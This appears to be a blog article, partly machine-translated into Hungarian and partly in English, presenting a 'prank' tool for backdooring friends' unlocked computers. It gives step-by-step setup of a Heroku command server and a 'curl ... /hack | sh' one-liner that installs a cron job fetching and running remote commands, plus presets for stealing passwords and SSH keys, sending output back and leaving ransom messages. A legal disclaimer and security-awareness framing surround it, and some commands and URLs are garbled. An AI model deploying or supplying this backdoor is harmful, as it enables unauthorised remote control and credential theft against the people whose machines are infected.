Hogyan lehet feltörni a barátaidat

A barátaim gyakran nyitva és feloldva hagyják számítógépeiket. Mondom nekik, hogy valószínűleg meg kell szokniuk, hogy lezárják a számítógépüket, de nem hallgatnak rám. Így létrehoztam egy egyszerű projektet, hogy feltörjem a barátaimat, és megmutassam nekik a számítógépes biztonság fontosságát.

Csak annyit kell tennem, hogy megvárom, amíg néhány másodpercig nyitva hagyják számítógépüket, kinyitják a termináljukat, és beírnak egy rövid parancsot.

Ez az! A számítógépük megfertőződött, és távolról futtathatom a kívánt parancsokat ezen a számítógépen. Nagyon édes, igaz? Vagy talán sokkoló?

A hackelés illegális. Kimondottan:

„Szándékos hozzáférés a számítógéphez engedély nélkül vagy az engedélyezett hozzáférés túllépése” - a számítógépes csalásról és visszaélésről szóló törvény (18 USC 1030)

Tehát ne feledje, hogy ennek a cikknek az a célja, hogy megmutassa, mennyire egyszerű lenne rossz szándékú személyek számára feltörni, így elkerülheti, hogy maga is feltörje.

Nem kell valami hacker géniusz, hogy tönkretegye az életét - minden olyan "script kiddy", aki fizikai hozzáférést nyerhet a számítógépéhez, veszélyeztetheti Önt, ha letölti a mindössze 50 sornyi kódot tartalmazó szkriptet.

A beállítás megkezdése

A projekt összes kódja ebben az adattárban él, ha közvetlenül be akar ugrani, de az alábbiakban elmagyarázom, hogyan működik mindez.

Először csak klónoznia kell a repót, telepítenie kell a függőségeket, és össze kell kapcsolnia a hack parancssori felület (CLI) eszközt.

git clone //github.com/ccorcos/hack.gitgit remote remove origincd hacknpm installnpm link

Ezután be kell állítania a Herokut a baráti gépen futó szkriptek tárolására. Ha még soha nem használta a Herokut, regisztráljon itt (ingyenes!), És állítsa be a CLI eszközét a gépén.

brew install heroku-toolbeltheroku login

Most a hack repo belsejében hozzon létre egy Heroku alkalmazást, amelynek neve könnyen megjegyezhető. Hacker-chet használok .

heroku create hacker-chet

Ezután futtatnia kell egy parancsot egy kis beállításhoz. Minden ez tényleg csinál kezd a gyökér URL-t a Heroku a weboldalt, és, hogy azt a package.json . Így a szerver az alkalmazás URL-jét be tudja injekciózni a shell parancsfájlokba.

npm run init

Helyileg indíthatja a szervert, ha feltörni akarja magát, és tesztelni szeretné a dolgokat.

npm start

Vagy bevetheti Heroku-ba.

npm run deploy

Most már készen áll a feltörésre!

Hack API

Ennek a programnak az a szépsége, hogy valakinek feltöréséhez csak egyetlen parancsot kell futtatnia a gépén.

curl /hack | sh

A ROOT_URL az alkalmazás elérési útja. Amikor lokálisan futtatja a szervert, ez a localhost: 5000 lesz, és amikor Heroku-ra telepíti, valami hasonló lesz .herokua pp.com.

Ez azt jelenti, hogy létrehoz egy cron feladatot - egy „kronológiai munkát”, amely bizonyos időpontokban újra elvégzi a feladatokat -, hogy percenként pingelje az / env / live végpontot, és az eredményt sh- be vezesse . Valójában nagyon egyszerű! És Heroku ingyen ad neked HTTPS-t, tehát a „biztonságos”?

Miután feltörte barátját, a számítógépén lévő parancssori eszközzel mindent megtehet.

A Hack eszköz a különböző feltört környezetek koncepcióját tartalmazza. Amikor feltör valakit a / hack végpont használatával, az a személy elindul az élő környezetben. Minden környezethez különféle parancsokat futtathat. Mindent bemutatok egy kis áttekintéssel.

Az alábbiak átírják az élő környezet shell parancsfájlját a következő parancs végrehajtására, amely hangosan azt mondja: „Figyelek téged”.

hack live exec "say 'I\'m watching you'"

Nos, ez még nem fog működni, még mindig újra telepítenie kell a Heroku alkalmazását.

hack deploy

Most várjon a következő percre, és nézze meg, hogy barátja számítógépe ping-e a szerverén, a szervernaplók testreszabásával.

hack logs

A környezetek lényege, hogy egyszerre több embert is feltörhessen. A különböző környezetekben élő emberek elszigeteléséhez csak meg kell változtatnia a nevet.

hack live rename jon

A következő alkalommal, amikor az élő környezetet pingálják, átírja a cron feladatot, hogy elkezdje pingelni a jon környezetet.

Mindent ugyanúgy tehet, ha megváltoztatja a környezeti argumentumot.

hack jon exec "say 'hello jon'"

Most, ha elég jól érezte magát a napra, és a buli véget ért, elfelejtheti Jont, és biztosíthatja őt arról, hogy „kibontotta”.

hack jon forget

Ez törli a cron munkát a számítógépükről. Vagy érdemes ezt a környezetet alvó-cellás módba állítani, hogy később helyreállítsa.

hack jon interval 1d

Now, rather than pinging your server every minute (the default), it will ping every day at midnight. And when you want to wake it back up, you can change the interval back to every minute and the next day, you’re good to go!

hack jon interval 1m

Some other fun things to do are setting up additional cron jobs. Here’s how you can wake your friend up at 6am every morning to remind him about computer security.

hack jon cron "0 6 * * * say 'good morning jon, remember what I told you about locking your computer?'"

P.S. If you don’t remember how cron jobs work, this is a great resource. It pretty much all comes down to this little diagram.

* * * * *| | | | || | | | || | | | +---- Day of the Week (range: 1-7, 1 standing for Monday)| | | +------ Month of the Year (range: 1-12)| | +-------- Day of the Month (range: 1-31)| +---------- Hour (range: 0-23)+------------ Minute (range: 0-59)

One of my favorites is the desktop preset which will download an image from a given URL and set it as the background photo.

hack jon preset desktop //i.imgur.com/5FC2r9R.jpg

And if you’ve written a ton of cron jobs and you don’t know what’s on there anymore, you can use the dump command.

hack jon dump "crontab -l"

Now whip open your logs and you’ll see the output on the next ping. This is actually much more sinister now that you can get information back. If you wanted to be more nefarious, you can search for decrypted passwords or steal their ssh keys.

hack jon preset passwordshack jon preset ssh

But if you just want to give him a good old-fashioned scare, send him a ransom message!

hack jon preset ransom "Hello Jon, I told you not to leave your computer unlocked."

Lastly, if you find yourself adding a bunch of cron jobs and just want to start over, reset is here to help.

hack jon reset

Now go have (responsible) fun with this thing and let me know what your favorite pranks are by submitting a pull request with a new command or preset!

Happy Hacking!